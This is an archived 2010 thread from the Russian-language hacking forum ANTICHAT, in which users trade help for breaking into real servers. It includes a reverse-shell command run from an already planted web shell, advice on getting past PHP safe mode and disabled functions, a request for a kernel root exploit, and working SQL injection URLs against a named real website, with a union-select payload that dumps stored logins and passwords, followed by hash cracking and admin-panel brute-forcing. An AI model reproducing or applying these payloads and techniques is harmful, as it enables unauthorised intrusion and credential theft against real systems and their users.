ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
12.02.2010, 19:16
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
есть шелл, на сервере включен сейф.. возможно как-то запустить бэк-коннект? disable_functions No value. хочу порутать,ядро 2007 года..
Последний раз редактировалось .:[melkiy]:.; 12.02.2010 в 19:21..
|
|
|
12.02.2010, 19:18
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
а как пробовал запускать уже?
|
|
|
|
12.02.2010, 19:22
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от Pashkela
а как пробовал запускать уже?
perl back.pl [ip] 53
|
|
|
|
12.02.2010, 19:29
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
а ты попробуй через бинарник сишный, баш, другой порт, бекконект встроенный в WSO2 тот же - отличная вещь, как практика показывает
PS: Порт повыше бери
Последний раз редактировалось Pashkela; 12.02.2010 в 19:34..
|
|
|
|
12.02.2010, 19:50
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
Если включен сейф-мод, то надо обходить, запуском бинарного бека вместо перлового - не обойдешь СМ.
|
|
|
|
12.02.2010, 23:20
|
|
Постоянный
Регистрация: 22.11.2008
Сообщений: 344
Провел на форуме:
3863128
Репутация:
570
|
|
Можно ли выполнить комманду если:
Код:
Disable functions : symlink, dl, shell_exec, exec, system, passthru, popen, proc_open, proc_nice, proc_get_status, proc_close, proc_terminate, posix_mkfifo, set_time_limit, imap_open, imap_body,imap_list, imap_createmailbox, imap_deletemailbox, imap_renamemailbox, mb_send_mail
|
|
|
|
13.02.2010, 00:05
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
http://www.pogoda.ua/index.php?id=6209+and+1=0+union+select+0,1,2,3,4--
там скуль четвертой версии...я пробрутил названия таблиц..толку мало...можно ли че-нить сделать ?!
|
|
|
|
13.02.2010, 00:47
|
|
Познающий
Регистрация: 09.04.2008
Сообщений: 79
Провел на форуме:
463189
Репутация:
124
|
|
Сообщение от daniel_1024
http://www.pogoda.ua/index.php?id=6209+and+1=0+union+select+0,1,2,3,4--
там скуль четвертой версии...я пробрутил названия таблиц..толку мало...можно ли че-нить сделать ?!
Вполне себе существует таблица users с полями login и password:
Код:
http://www.pogoda.ua/index.php?id=-1+union+select+0,concat_ws(0x3a,login,password),2,3,4+from+users--
Уж к чему-то, но они подходят.
Кроме того, прокатывает запрос вида:
Код:
http://www.pogoda.ua/index.php?id=-1+union+select+0,'1',2,3,4--
Подозреваю, что разрешены кавычки, но не уверен - попробовал прочитать файл через load_file(), - не вышло. Думаю, из-за того что файловых прав нет.
|
|
|
|
13.02.2010, 13:51
|
|
Познающий
Регистрация: 09.04.2008
Сообщений: 79
Провел на форуме:
463189
Репутация:
124
|
|
Сообщение от Strilo4ka
http://www.pogoda.ua/admin/login.php может поможет
хеш странный
Не знаю, у меня его замечательно расшифровал passcracking.ru . Проблема в том, что этот логин\пароль к админке не подошёл. Нужно дальше таблицы брутить.
|
|
|
|
13.02.2010, 03:21
|
|
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
Провел на форуме:
1311435
Репутация:
90
|
|
2.6.25 есть эксплоит?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1896802){kind=avatar}
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1896825){kind=avatar}
Похожие темы
Комбинированный вид
